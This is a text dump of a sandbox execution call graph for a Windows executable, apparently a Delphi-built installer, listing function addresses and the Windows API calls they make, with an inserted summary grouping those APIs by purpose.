4087e3 49743->49744 49745 4085b4 GetLocaleInfoA 49744->49745 49746 408800 49745->49746 49747 408568 19 API calls 49746->49747 49748 40881a 49747->49748 49749 403450 18 API calls 
49748->49749 49750 408827 49749->49750 49751 408568 19 API calls 49750->49751 49752 40883c 49751->49752 49753 403450 18 API calls 49752->49753 49754 408849 49753->49754 49755 4085b4 GetLocaleInfoA 49754->49755 49756 408857 49755->49756 49757 408568 19 API calls 49756->49757 49758 408871 49757->49758 49759 403450 18 API calls 49758->49759 49760 40887e 49759->49760 49761 408568 19 API calls 49760->49761 49762 408893 49761->49762 49763 403450 18 API calls 49762->49763 49764 4088a0 49763->49764 49765 408568 19 API calls 49764->49765 49766 4088b5 49765->49766 49767 4088d2 49766->49767 49768 4088c3 49766->49768 49770 403494 4 API calls 49767->49770 49881 403494 49768->49881 49771 4088d0 49770->49771 49772 408568 19 API calls 49771->49772 49773 4088f4 49772->49773 49774 408911 49773->49774 49775 408902 49773->49775 49777 403400 4 API calls 49774->49777 49776 403494 4 API calls 49775->49776 49778 40890f 49776->49778 49777->49778 49875 403634 49778->49875 49788 408cc8 49787->49788 49795 406dec LoadStringA 49788->49795 49808 4034e0 49795->49808 49798 403450 49799 403454 49798->49799 49802 403464 49798->49802 49801 4034bc 18 API calls 49799->49801 49799->49802 49800 403490 49804 403400 49800->49804 49801->49802 49802->49800 49858 402660 49802->49858 49805 40341f 49804->49805 49806 403406 49804->49806 49805->49718 49806->49805 49807 402660 4 API calls 49806->49807 49807->49805 49813 4034bc 49808->49813 49810 4034f0 49811 403400 4 API calls 49810->49811 49812 403508 49811->49812 49812->49798 49814 4034c0 49813->49814 49815 4034dc 49813->49815 49818 402648 49814->49818 49815->49810 49817 4034c9 49817->49810 49819 40264c 49818->49819 49821 402656 49818->49821 49824 402088 49819->49824 49820 402652 49820->49821 49835 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49820->49835 49821->49817 49821->49821 49825 40209c 49824->49825 49826 4020a1 49824->49826 49836 4019cc RtlInitializeCriticalSection 49825->49836 49828 4020c6 RtlEnterCriticalSection 49826->49828 49829 4020d0 
49826->49829 49834 4020a5 49826->49834 49828->49829 49829->49834 49843 401f94 49829->49843 49832 4021f1 RtlLeaveCriticalSection 49833 4021fb 49832->49833 49833->49820 49834->49820 49835->49821 49837 4019f0 RtlEnterCriticalSection 49836->49837 49838 4019fa 49836->49838 49837->49838 49839 401a18 LocalAlloc 49838->49839 49840 401a32 49839->49840 49841 401a81 49840->49841 49842 401a77 RtlLeaveCriticalSection 49840->49842 49841->49826 49842->49841 49844 401fa4 49843->49844 49845 401fd0 49844->49845 49848 401ff4 49844->49848 49849 401f0c 49844->49849 49845->49848 49854 401db4 49845->49854 49848->49832 49848->49833 49850 40178c LocalAlloc VirtualAlloc VirtualFree VirtualFree VirtualAlloc 49849->49850 49851 401f1c 49850->49851 49852 401f29 49851->49852 49853 401e80 9 API calls 49851->49853 49852->49844 49853->49852 49855 401dd2 49854->49855 49856 401e02 49854->49856 49855->49848 49856->49855 49857 401d1c 9 API calls 49856->49857 49857->49855 49859 402664 49858->49859 49861 40266e 49858->49861 49859->49861 49862 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49859->49862 49861->49800 49862->49861 49864 403426 49863->49864 49865 40344b 49864->49865 49866 402660 4 API calls 49864->49866 49865->49730 49866->49864 49868 4085a1 49867->49868 49869 40858f 49867->49869 49871 403494 4 API calls 49868->49871 49870 4034e0 18 API calls 49869->49870 49872 40859f 49870->49872 49871->49872 49872->49733 49874 4085d0 49873->49874 49874->49741 49876 40363c 49875->49876 49877 4034bc 18 API calls 49876->49877 49878 40364f 49877->49878 49879 403450 18 API calls 49878->49879 49880 403677 49879->49880 49883 403498 49881->49883 49882 4034ba 49882->49771 49883->49882 49884 402660 4 API calls 49883->49884 49884->49882 52174 42f520 52175 42f52b 52174->52175 52176 42f52f NtdllDefWindowProc_A 52174->52176 52176->52175 52177 4358e0 52178 4358f5 52177->52178 52182 43590f 52178->52182 52183 4352c8 52178->52183 52193 435312 52183->52193 52194 4352f8 52183->52194 52184 403400 4 API calls 52185 435717 
52184->52185 52185->52182 52196 435728 18 API calls 52185->52196 52186 446da4 18 API calls 52186->52194 52187 403744 18 API calls 52187->52194 52188 403450 18 API calls 52188->52194 52189 402648 18 API calls 52189->52194 52192 4038a4 18 API calls 52192->52194 52193->52184 52194->52186 52194->52187 52194->52188 52194->52189 52194->52192 52194->52193 52197 4343b0 52194->52197 52209 434b74 18 API calls 52194->52209 52210 431ca0 52194->52210 52196->52182 52198 43446d 52197->52198 52199 4343dd 52197->52199 52234 434310 18 API calls 52198->52234 52201 403494 4 API calls 52199->52201 52203 4343eb 52201->52203 52202 43445f 52204 403400 4 API calls 52202->52204 52205 403778 18 API calls 52203->52205 52206 4344bd 52204->52206 52207 43440c 52205->52207 52206->52194 52207->52202 52216 494944 52207->52216 52209->52194 52211 431cae 52210->52211 52214 431cc0 52210->52214 52275 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52211->52275 52213 431ce2 52213->52194 52214->52213 52276 431c40 18 API calls 52214->52276 52217 49497c 52216->52217 52218 494a14 52216->52218 52219 403494 4 API calls 52217->52219 52235 448930 52218->52235 52223 494987 52219->52223 52221 403400 4 API calls 52222 494a38 52221->52222 52224 403400 4 API calls 52222->52224 52225 4037b8 18 API calls 52223->52225 52227 494997 52223->52227 52226 494a40 52224->52226 52228 4949b0 52225->52228 52226->52207 52227->52221 52228->52227 52229 4037b8 18 API calls 52228->52229 52230 4949d3 52229->52230 52231 403778 18 API calls 52230->52231 52232 494a04 52231->52232 52233 403634 18 API calls 52232->52233 52233->52218 52234->52202 52236 448955 52235->52236 52246 448998 52235->52246 52237 403494 4 API calls 52236->52237 52241 448960 52237->52241 52238 4489ac 52240 403400 4 API calls 52238->52240 52243 4489df 52240->52243 52242 4037b8 18 API calls 52241->52242 52244 44897c 52242->52244 52243->52227 52245 4037b8 18 API calls 52244->52245 52245->52246 52246->52238 52247 44852c 52246->52247 52248 403494 4 API calls 
52247->52248 52249 448562 52248->52249 52250 4037b8 18 API calls 52249->52250 52251 448574 52250->52251 52252 403778 18 API calls 52251->52252 52253 448595 52252->52253 52254 4037b8 18 API calls 52253->52254 52255 4485ad 52254->52255 52256 403778 18 API calls 52255->52256 52257 4485d8 52256->52257 52258 4037b8 18 API calls 52257->52258 52269 4485f0 52258->52269 52259 448628 52261 403420 4 API calls 52259->52261 52260 4486c3 52265 4486cb GetProcAddress 52260->52265 52262 448708 52261->52262 52262->52238 52263 44864b LoadLibraryExA 52263->52269 52264 44865d LoadLibraryA 52264->52269 52266 4486de 52265->52266 52266->52259 52268 403450 18 API calls 52268->52269 52269->52259 52269->52260 52269->52263 52269->52264 52269->52268 52271 403b80 52269->52271 52274 43da88 18 API calls 52269->52274 52272 402648 18 API calls 52271->52272 52273 403b86 52272->52273 52273->52269 52274->52269 52275->52214 52276->52213 52277 416b42 52278 416bea 52277->52278 52279 416b5a 52277->52279 52296 41531c 18 API calls 52278->52296 52281 416b74 SendMessageA 52279->52281 52282 416b68 52279->52282 52292 416bc8 52281->52292 52283 416b72 CallWindowProcA 52282->52283 52284 416b8e 52282->52284 52283->52292 52293 41a058 GetSysColor 52284->52293 52287 416b99 SetTextColor 52288 416bae 52287->52288 52294 41a058 GetSysColor 52288->52294 52290 416bb3 SetBkColor 52295 41a6e0 GetSysColor CreateBrushIndirect 52290->52295 52293->52287 52294->52290 52295->52292 52296->52292 52297 416644 52298 416651 52297->52298 52299 4166ab 52297->52299 52304 416550 CreateWindowExA 52298->52304 52300 416658 SetPropA SetPropA 52300->52299 52301 41668b 52300->52301 52302 41669e SetWindowPos 52301->52302 52302->52299 52304->52300 52305 4222e4 52306 4222f3 52305->52306 52311 421274 52306->52311 52308 422313 52312 4212e3 52311->52312 52316 421283 52311->52316 52315 4212f4 52312->52315 52336 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 52312->52336 52314 421322 52318 421395 52314->52318 52326 42133d 52314->52326 52315->52314 
Execution Graph (Joe Sandbox call-graph view). The interactive graph does not survive as text; its node IDs, function addresses and edge lists are not reproduced here. What is recoverable is the set of Windows APIs the graphed functions resolve to in this part of the graph, grouped below, plus a few multi-call nodes the graph labels with an explicit sequence.

Memory, TLS, thread and error handling: LocalAlloc, TlsSetValue, TlsGetValue, GetCurrentThreadId, TerminateThread, SetErrorMode, SetLastError, GetLastError, KiUserCallbackDispatcher, MulDiv, MultiByteToWideChar, IsDBCSLeadByte, CharNextA.

File system and paths: WriteFile, DeleteFileA, MoveFileA, CreateDirectoryA, RemoveDirectoryA, GetFileAttributesA, GetDriveTypeA, SetCurrentDirectoryA, SHPathPrepareForWriteA, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection.

Registry: RegOpenKeyExA, RegCloseKey.

Window, menu and message handling: SetMenu, GetMenu, GetMenuItemCount, GetMenuStringA, GetMenuState, DestroyWindow, MessageBeep, IsWindow, IsWindowVisible, IsWindowEnabled, EnableWindow, SetActiveWindow, GetActiveWindow, GetFocus, SetFocus, RegisterClassA, CreateWindowExA, ShowWindow, GetWindowTextA, GetWindowLongA, GetSystemMetrics, SendMessageA, PeekMessageA, TranslateMessage, DispatchMessageA, TranslateMDISysAccel, IsDialogMessage, GetCapture, EnumThreadWindows, UnhookWindowsHookEx, KillTimer, SetScrollInfo, GetScrollPos, SetScrollPos, ScrollWindow, SetWindowPos.

Labelled call sequences in this region of the graph (function address as shown in the report, followed by the APIs the node lists):
452908: Wow64DisableWow64FsRedirection, SetLastError, Wow64RevertWow64FsRedirection, DeleteFileA, GetLastError
452e10: Wow64DisableWow64FsRedirection, SetLastError, Wow64RevertWow64FsRedirection, RemoveDirectoryA, GetLastError
452c80 / 452cc1: MoveFileA, GetLastError, then Wow64RevertWow64FsRedirection at 452760
4527a8: CreateDirectoryA, GetLastError, then Wow64RevertWow64FsRedirection at 452760
424cb8: UnhookWindowsHookEx, TerminateThread, KillTimer, IsWindowVisible, ShowWindow
41f9bc: GetWindowLongA, GetSystemMetrics, GetSystemMetrics, GetWindowLongA
417e48: IsWindowVisible, ScrollWindow, SetWindowPos
4124d0: GetMenuItemCount, GetMenuStringA, GetMenuState
41eea4: GetCurrentThreadId, EnumThreadWindows
42f58f: GetActiveWindow, GetFocus; 42f5b3: RegisterClassA; 42f5d1 and 42f634: CreateWindowExA
433dd0, 443610, 443620, 403a38, 433b18, 436e4c, 433d34: LocalAlloc, TlsSetValue, TlsGetValue, TlsGetValue

The graph also marks many intermediate nodes only with an API-call count (for example "18 API calls", "32 API calls") rather than names; those counts are not reproduced here.
55333->55334 55335 40e96c 19 API calls 55334->55335 55336 40db9e 55335->55336 55337 40e96c 19 API calls 55336->55337 55338 40dba9 55337->55338 55339 40dbc4 55338->55339 55340 40dbbb 55338->55340 55344 40dbc1 55338->55344 55443 40d9d8 55339->55443 55446 40dac8 33 API calls 55340->55446 55343 403420 4 API calls 55345 40dc8f 55343->55345 55344->55343 55345->55305 55347 40e3f6 55346->55347 55348 40e3ec 55346->55348 55350 40e511 55347->55350 55351 40e495 55347->55351 55352 40e4f6 55347->55352 55353 40e576 55347->55353 55354 40e438 55347->55354 55355 40e4d9 55347->55355 55356 40e47a 55347->55356 55357 40e4bb 55347->55357 55388 40e45c 55347->55388 55403 40d440 19 API calls 55348->55403 55358 40d764 19 API calls 55350->55358 55411 40de24 19 API calls 55351->55411 55416 40e890 19 API calls 55352->55416 55362 40d764 19 API calls 55353->55362 55404 40d764 55354->55404 55414 40e9a8 19 API calls 55355->55414 55410 40d818 19 API calls 55356->55410 55413 40dde4 19 API calls 55357->55413 55367 40e519 55358->55367 55361 403400 4 API calls 55368 40e5eb 55361->55368 55369 40e57e 55362->55369 55373 40e523 55367->55373 55374 40e51d 55367->55374 55368->55322 55375 40e582 55369->55375 55376 40e59b 55369->55376 55370 40e4e4 55415 409d38 18 API calls 55370->55415 55372 40e4a0 55412 40d470 19 API calls 55372->55412 55417 40ea08 55373->55417 55382 40e521 55374->55382 55383 40e53c 55374->55383 55385 40ea08 19 API calls 55375->55385 55423 40de24 19 API calls 55376->55423 55378 40e461 55409 40ded8 19 API calls 55378->55409 55379 40e444 55407 40de24 19 API calls 55379->55407 55421 40de24 19 API calls 55382->55421 55389 40ea08 19 API calls 55383->55389 55385->55388 55388->55361 55392 40e544 55389->55392 55390 40e44f 55408 40e26c 19 API calls 55390->55408 55420 40d8a0 19 API calls 55392->55420 55394 40e566 55422 40e2d4 18 API calls 55394->55422 55429 40b9d0 55397->55429 55400->55314 55401->55314 55402 40d774 19 API calls 55402->55322 55403->55347 55405 40ea08 19 API calls 55404->55405 55406 40d76e 
55405->55406 55406->55378 55406->55379 55407->55390 55408->55388 55409->55388 55410->55388 55411->55372 55412->55388 55413->55388 55414->55370 55415->55388 55416->55388 55424 40d780 55417->55424 55420->55388 55421->55394 55422->55388 55423->55388 55427 40d78b 55424->55427 55425 40d7c5 55425->55388 55427->55425 55428 40d7cc 19 API calls 55427->55428 55428->55427 55430 40b9e2 55429->55430 55432 40ba07 55429->55432 55430->55432 55433 40ba84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55430->55433 55432->55322 55432->55402 55433->55432 55435 40ea08 19 API calls 55434->55435 55436 40d4c9 55435->55436 55437 40d4dc 55436->55437 55441 40eb0c 19 API calls 55436->55441 55437->55305 55439 40d4d7 55442 40d458 19 API calls 55439->55442 55441->55439 55442->55437 55447 40ab7c 33 API calls 55443->55447 55445 40da00 55445->55344 55446->55344 55447->55445 55448 41363c SetWindowLongA GetWindowLongA 55449 413699 SetPropA SetPropA 55448->55449 55450 41367b GetWindowLongA 55448->55450 55455 41f39c 55449->55455 55450->55449 55451 41368a SetWindowLongA 55450->55451 55451->55449 55460 415270 55455->55460 55467 423c0c 55455->55467 55561 423a84 55455->55561 55456 4136e9 55461 41527d 55460->55461 55462 4152e3 55461->55462 55463 4152d8 55461->55463 55466 4152e1 55461->55466 55568 424b8c 13 API calls 55462->55568 55463->55466 55569 41505c 60 API calls 55463->55569 55466->55456 55470 423c42 55467->55470 55488 423c63 55470->55488 55570 423b68 55470->55570 55471 423cec 55473 423cf3 55471->55473 55474 423d27 55471->55474 55472 423c8d 55475 423c93 55472->55475 55476 423d50 55472->55476 55481 423cf9 55473->55481 55520 423fb1 55473->55520 55477 423d32 55474->55477 55478 42409a IsIconic 55474->55478 55482 423cc5 55475->55482 55483 423c98 55475->55483 55479 423d62 55476->55479 55480 423d6b 55476->55480 55486 4240d6 55477->55486 55487 423d3b 55477->55487 55478->55488 55492 4240ae GetFocus 55478->55492 55489 423d78 55479->55489 55490 423d69 55479->55490 55577 424194 11 API calls 55480->55577 55493 
423f13 SendMessageA 55481->55493 55494 423d07 55481->55494 55482->55488 55510 423cde 55482->55510 55511 423e3f 55482->55511 55484 423df6 55483->55484 55485 423c9e 55483->55485 55582 423b84 NtdllDefWindowProc_A 55484->55582 55499 423ca7 55485->55499 55500 423e1e PostMessageA 55485->55500 55591 424850 WinHelpA PostMessageA 55486->55591 55496 4240ed 55487->55496 55512 423cc0 55487->55512 55488->55456 55497 4241dc 11 API calls 55489->55497 55578 423b84 NtdllDefWindowProc_A 55490->55578 55492->55488 55498 4240bf 55492->55498 55493->55488 55494->55488 55494->55512 55540 423f56 55494->55540 55508 4240f6 55496->55508 55509 42410b 55496->55509 55497->55488 55590 41eff4 GetCurrentThreadId EnumThreadWindows 55498->55590 55505 423cb0 55499->55505 55506 423ea5 55499->55506 55583 423b84 NtdllDefWindowProc_A 55500->55583 55515 423cb9 55505->55515 55516 423dce IsIconic 55505->55516 55517 423eae 55506->55517 55518 423edf 55506->55518 55507 423e39 55507->55488 55519 4244d4 19 API calls 55508->55519 55592 42452c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 55509->55592 55510->55512 55521 423e0b 55510->55521 55574 423b84 NtdllDefWindowProc_A 55511->55574 55512->55488 55576 423b84 NtdllDefWindowProc_A 55512->55576 55514 4240c6 55514->55488 55526 4240ce SetFocus 55514->55526 55515->55512 55527 423d91 55515->55527 55529 423dea 55516->55529 55530 423dde 55516->55530 55585 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 55517->55585 55575 423b84 NtdllDefWindowProc_A 55518->55575 55519->55488 55520->55488 55537 423fd7 IsWindowEnabled 55520->55537 55524 424178 26 API calls 55521->55524 55524->55488 55525 423e45 55534 423e83 55525->55534 55535 423e61 55525->55535 55526->55488 55527->55488 55579 422c4c ShowWindow PostMessageA PostQuitMessage 55527->55579 55581 423b84 NtdllDefWindowProc_A 55529->55581 55580 423bc0 29 API calls 55530->55580 55533 423ee5 55539 423efd 55533->55539 55546 41eea4 2 API calls 55533->55546 55542 423a84 6 API calls 55534->55542 55584 
423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 55535->55584 55536 423eb6 55544 423ec8 55536->55544 55551 41ef58 6 API calls 55536->55551 55537->55488 55545 423fe5 55537->55545 55547 423a84 6 API calls 55539->55547 55540->55488 55548 423f78 IsWindowEnabled 55540->55548 55550 423e8b PostMessageA 55542->55550 55586 423b84 NtdllDefWindowProc_A 55544->55586 55554 423fec IsWindowVisible 55545->55554 55546->55539 55547->55488 55548->55488 55553 423f86 55548->55553 55549 423e69 PostMessageA 55549->55488 55550->55488 55551->55544 55587 412310 21 API calls 55553->55587 55554->55488 55556 423ffa GetFocus 55554->55556 55557 4181e0 55556->55557 55558 42400f SetFocus 55557->55558 55588 415240 55558->55588 55562 423a94 55561->55562 55564 423b0d 55561->55564 55563 423a9a EnumWindows 55562->55563 55562->55564 55563->55564 55565 423ab6 GetWindow GetWindowLongA 55563->55565 55593 423a1c GetWindow 55563->55593 55564->55456 55566 423ad5 55565->55566 55566->55564 55567 423b01 SetWindowPos 55566->55567 55567->55564 55567->55566 55568->55466 55569->55466 55571 423b72 55570->55571 55572 423b7d 55570->55572 55571->55572 55573 408720 21 API calls 55571->55573 55572->55471 55572->55472 55573->55572 55574->55525 55575->55533 55576->55488 55577->55488 55578->55488 55579->55488 55580->55488 55581->55488 55582->55488 55583->55507 55584->55549 55585->55536 55586->55488 55587->55488 55589 41525b SetFocus 55588->55589 55589->55488 55590->55514 55591->55507 55592->55507 55594 423a3d GetWindowLongA 55593->55594 55595 423a49 55593->55595 55594->55595 55596 4809f7 55597 480a00 55596->55597 55598 480a2b 55596->55598 55597->55598 55599 480a1d 55597->55599 55601 480a6a 55598->55601 55970 47f4a4 18 API calls 55598->55970 55968 476c50 203 API calls 55599->55968 55602 480a8e 55601->55602 55606 480a81 55601->55606 55607 480a83 55601->55607 55609 480aca 55602->55609 55610 480aac 55602->55610 55604 480a22 55604->55598 55969 408be0 19 API calls 55604->55969 55605 480a5d 55971 47f50c 56 API 
calls 55605->55971 55613 47f4e8 56 API calls 55606->55613 55972 47f57c 56 API calls 55607->55972 55975 47f33c 38 API calls 55609->55975 55614 480ac1 55610->55614 55973 47f50c 56 API calls 55610->55973 55613->55602 55974 47f33c 38 API calls 55614->55974 55616 480ac8 55619 480ada 55616->55619 55620 480ae0 55616->55620 55621 480ade 55619->55621 55624 47f4e8 56 API calls 55619->55624 55620->55621 55622 47f4e8 56 API calls 55620->55622 55722 47c66c 55621->55722 55622->55621 55624->55621 55625 480b07 55796 47cb94 55625->55796 55630 480b21 55632 480b31 55630->55632 55868 47f8d0 55630->55868 55634 480b88 55632->55634 55888 4502c0 55632->55888 55893 47fc70 55634->55893 55637 480b8d 55638 480b9a 55637->55638 55639 480cdd 55637->55639 55898 494b50 55638->55898 55641 47fb8c 32 API calls 55639->55641 55640 480b52 55640->55634 55648 4314f8 18 API calls 55640->55648 55643 480cdb 55641->55643 55646 47c26c 57 API calls 55643->55646 55649 480cfc 55646->55649 55648->55634 55652 403450 18 API calls 55649->55652 55723 42d898 GetWindowsDirectoryA 55722->55723 55724 47c690 55723->55724 55725 403450 18 API calls 55724->55725 55726 47c69d 55725->55726 55727 42d8c4 GetSystemDirectoryA 55726->55727 55728 47c6a5 55727->55728 55729 403450 18 API calls 55728->55729 55730 47c6b2 55729->55730 55731 42d8f0 6 API calls 55730->55731 55732 47c6ba 55731->55732 55733 403450 18 API calls 55732->55733 55734 47c6c7 55733->55734 55735 47c6d0 55734->55735 55736 47c6ec 55734->55736 56007 42d208 55735->56007 55737 403400 4 API calls 55736->55737 55740 47c6ea 55737->55740 55742 47c731 55740->55742 55743 42c8cc 19 API calls 55740->55743 55741 403450 18 API calls 55741->55740 55987 47c4f4 55742->55987 55745 47c70c 55743->55745 55748 403450 18 API calls 55745->55748 55747 403450 18 API calls 55749 47c74d 55747->55749 55750 47c719 55748->55750 55751 47c76b 55749->55751 55752 4035c0 18 API calls 55749->55752 55750->55742 55754 403450 18 API calls 55750->55754 55753 47c4f4 22 API calls 55751->55753 55752->55751 
55755 47c77a 55753->55755 55754->55742 55756 403450 18 API calls 55755->55756 55757 47c787 55756->55757 55758 47c7af 55757->55758 55759 42c3fc 19 API calls 55757->55759 55760 47c816 55758->55760 55763 47c4f4 22 API calls 55758->55763 55761 47c79d 55759->55761 55762 47c8de 55760->55762 55768 47c836 SHGetKnownFolderPath 55760->55768 55767 4035c0 18 API calls 55761->55767 55765 47c8e7 55762->55765 55766 47c908 55762->55766 55764 47c7c7 55763->55764 55769 403450 18 API calls 55764->55769 55770 42c3fc 19 API calls 55765->55770 55771 42c3fc 19 API calls 55766->55771 55767->55758 55772 47c850 55768->55772 55773 47c88b SHGetKnownFolderPath 55768->55773 55775 47c7d4 55769->55775 55777 47c8f4 55770->55777 55778 47c915 55771->55778 56017 403ba4 21 API calls 55772->56017 55773->55762 55776 47c8a5 55773->55776 55780 47c7e7 55775->55780 56015 453344 18 API calls 55775->56015 56018 403ba4 21 API calls 55776->56018 55782 4035c0 18 API calls 55777->55782 55783 4035c0 18 API calls 55778->55783 55779 47c86b CoTaskMemFree 55779->55625 55787 47c4f4 22 API calls 55780->55787 55784 47c906 55782->55784 55783->55784 55998 47c5d8 55784->55998 55786 47c8c0 CoTaskMemFree 55786->55625 55789 47c7f6 55787->55789 55791 403450 18 API calls 55789->55791 55793 47c803 55791->55793 55792 403400 4 API calls 55794 47c941 55792->55794 55793->55760 56016 453344 18 API calls 55793->56016 55794->55625 55797 47cb9c 55796->55797 55797->55797 56020 453a24 55797->56020 55800 403450 18 API calls 55801 47cbc9 55800->55801 55802 403494 4 API calls 55801->55802 55803 47cbd6 55802->55803 55804 40357c 18 API calls 55803->55804 55805 47cbe4 55804->55805 55806 457d10 38 API calls 55805->55806 55807 47cbec 55806->55807 55808 47cbff 55807->55808 56050 457508 20 API calls 55807->56050 55810 42c3fc 19 API calls 55808->55810 55811 47cc0c 55810->55811 55812 4035c0 18 API calls 55811->55812 55813 47cc1c 55812->55813 55814 47cc26 CreateDirectoryA 55813->55814 55815 47cc30 GetLastError 55814->55815 55837 47cc8c 55814->55837 
55817 451458 18 API calls 55815->55817 55819 47cc48 55817->55819 55818 47cc99 55820 47ccc2 55818->55820 55824 4035c0 18 API calls 55818->55824 56051 406d68 33 API calls 55819->56051 55823 403420 4 API calls 55820->55823 55822 47cc58 55825 42e8c8 19 API calls 55822->55825 55826 47ccdc 55823->55826 55827 47ccaf 55824->55827 55828 47cc68 55825->55828 55829 403420 4 API calls 55826->55829 56045 47cb3c 55827->56045 55831 451428 18 API calls 55828->55831 55832 47cce9 55829->55832 55835 47cc7d 55831->55835 55838 47ce78 55832->55838 55833 47ccba 56053 458450 18 API calls 55833->56053 56052 408c0c 18 API calls 55835->56052 56038 458410 55837->56038 55839 42c3fc 19 API calls 55838->55839 55840 47cea4 55839->55840 55841 4035c0 18 API calls 55840->55841 55842 47ceb4 55841->55842 55843 47cb3c 39 API calls 55842->55843 55844 47cec1 55843->55844 56114 4525d8 55844->56114 55847 47ceda 55849 4525d8 44 API calls 55847->55849 55850 47cee7 55849->55850 55851 47cf20 55850->55851 55852 403494 4 API calls 55850->55852 55853 42e394 2 API calls 55851->55853 55852->55851 55854 47cf2f 55853->55854 55855 42e394 2 API calls 55854->55855 55856 47cf3c 55855->55856 55857 47cf6f GetProcAddress 55856->55857 55860 4078f4 33 API calls 55856->55860 55858 47cf95 55857->55858 55859 47cf8b 55857->55859 55862 403400 4 API calls 55858->55862 56119 453344 18 API calls 55859->56119 55863 47cf67 55860->55863 55864 47cfaa 55862->55864 56118 453344 18 API calls 55863->56118 55866 403400 4 API calls 55864->55866 55867 47cfb2 55866->55867 55867->55630 55976 47f738 45 API calls 55867->55976 55869 42c3fc 19 API calls 55868->55869 55870 47f8fc 55869->55870 55871 4035c0 18 API calls 55870->55871 55872 47f90c 55871->55872 55873 47ca60 35 API calls 55872->55873 55874 47f91a 55873->55874 55875 42e394 2 API calls 55874->55875 55876 47f932 55875->55876 55877 47f965 55876->55877 55878 47f940 55876->55878 56135 45d188 GetProcAddress GetProcAddress GetProcAddress ISCryptGetVersion 55877->56135 55879 4078f4 33 API calls 
55878->55879 55881 47f95d 55879->55881 55882 47f96f 55889 4502d3 GetVersion 55888->55889 55890 45037c 55888->55890 55889->55890 55891 4502e6 LoadLibraryA 55889->55891 55890->55640 55891->55890 55892 4502fe 6 API calls 55891->55892 55892->55890 55894 47fc81 55893->55894 55895 47fcbc 55894->55895 55896 47fcac 55894->55896 55895->55637 56137 47e758 6 API calls 55896->56137 55899 494b5a 55898->55899 56138 44845c 55899->56138 55968->55604 55970->55605 55971->55601 55972->55602 55973->55614 55974->55616 55975->55616 55976->55630 55988 42de1c RegOpenKeyExA 55987->55988 55989 47c51a 55988->55989 55990 47c540 55989->55990 55991 47c51e 55989->55991 55992 403400 4 API calls 55990->55992 55993 42dd4c 20 API calls 55991->55993 55994 47c547 55992->55994 55995 47c52a 55993->55995 55994->55747 55996 47c535 RegCloseKey 55995->55996 55997 403400 4 API calls 55995->55997 55996->55994 55997->55996 55999 47c5e6 55998->55999 56000 42de1c RegOpenKeyExA 55999->56000 56001 47c60e 56000->56001 56002 47c63f 56001->56002 56003 42dd4c 20 API calls 56001->56003 56002->55792 56004 47c624 56003->56004 56005 42dd4c 20 API calls 56004->56005 56006 47c636 RegCloseKey 56005->56006 56006->56002 56008 4038a4 18 API calls 56007->56008 56009 42d21b 56008->56009 56010 42d232 GetEnvironmentVariableA 56009->56010 56014 42d245 56009->56014 56019 42dbd0 18 API calls 56009->56019 56010->56009 56011 42d23e 56010->56011 56012 403400 4 API calls 56011->56012 56012->56014 56014->55741 56015->55780 56016->55760 56017->55779 56018->55786 56019->56009 56023 453a44 56020->56023 56022 4537b0 25 API calls 56022->56023 56023->56022 56024 453a69 CreateDirectoryA 56023->56024 56029 451458 18 API calls 56023->56029 56035 42e8c8 19 API calls 56023->56035 56036 451428 18 API calls 56023->56036 56054 42da18 56023->56054 56077 406d68 33 API calls 56023->56077 56078 408c0c 18 API calls 56023->56078 56025 453ae1 56024->56025 56026 453a73 GetLastError 56024->56026 56027 403494 4 API calls 56025->56027 56026->56023 56028 453aeb 
56027->56028 56030 403420 4 API calls 56028->56030 56029->56023 56031 453b05 56030->56031 56033 403420 4 API calls 56031->56033 56034 453b12 56033->56034 56034->55800 56035->56023 56036->56023 56039 45841c 56038->56039 56040 45842a 56038->56040 56042 403494 4 API calls 56039->56042 56041 403400 4 API calls 56040->56041 56043 458431 56041->56043 56044 458428 56042->56044 56043->55818 56044->55818 56046 40cf4c 37 API calls 56045->56046 56047 47cb58 56046->56047 56079 47ca60 56047->56079 56049 47cb73 56049->55833 56050->55808 56051->55822 56052->55837 56053->55820 56055 42d208 19 API calls 56054->56055 56056 42da3e 56055->56056 56057 42da4a 56056->56057 56058 42cd48 21 API calls 56056->56058 56059 42d208 19 API calls 56057->56059 56061 42da96 56057->56061 56058->56057 56060 42da5a 56059->56060 56062 42da66 56060->56062 56064 42cd48 21 API calls 56060->56064 56063 42c804 19 API calls 56061->56063 56062->56061 56067 42d208 19 API calls 56062->56067 56073 42da8b 56062->56073 56066 42daa0 56063->56066 56064->56062 56065 42d898 GetWindowsDirectoryA 56065->56061 56068 42c3fc 19 API calls 56066->56068 56069 42da7f 56067->56069 56070 42daab 56068->56070 56072 42cd48 21 API calls 56069->56072 56069->56073 56071 403494 4 API calls 56070->56071 56074 42dab5 56071->56074 56072->56073 56073->56061 56073->56065 56075 403420 4 API calls 56074->56075 56076 42dacf 56075->56076 56076->56023 56077->56023 56078->56023 56086 40cda0 56079->56086 56081 47ca95 56082 403420 4 API calls 56081->56082 56083 47cb25 56082->56083 56084 403400 4 API calls 56083->56084 56085 47cb2d 56084->56085 56085->56049 56091 40cc50 56086->56091 56088 40cdba 56103 40cd88 56088->56103 56090 40cdd5 56090->56081 56092 40cc5d 56091->56092 56093 40cc79 56092->56093 56094 40ccae 56092->56094 56107 406ec0 56093->56107 56111 406e80 CreateFileA 56094->56111 56097 40cc80 56100 40cca7 56097->56100 56110 408d2c 33 API calls 56097->56110 56098 40ccb8 56098->56100 56112 408d2c 33 API calls 56098->56112 56100->56088 56102 
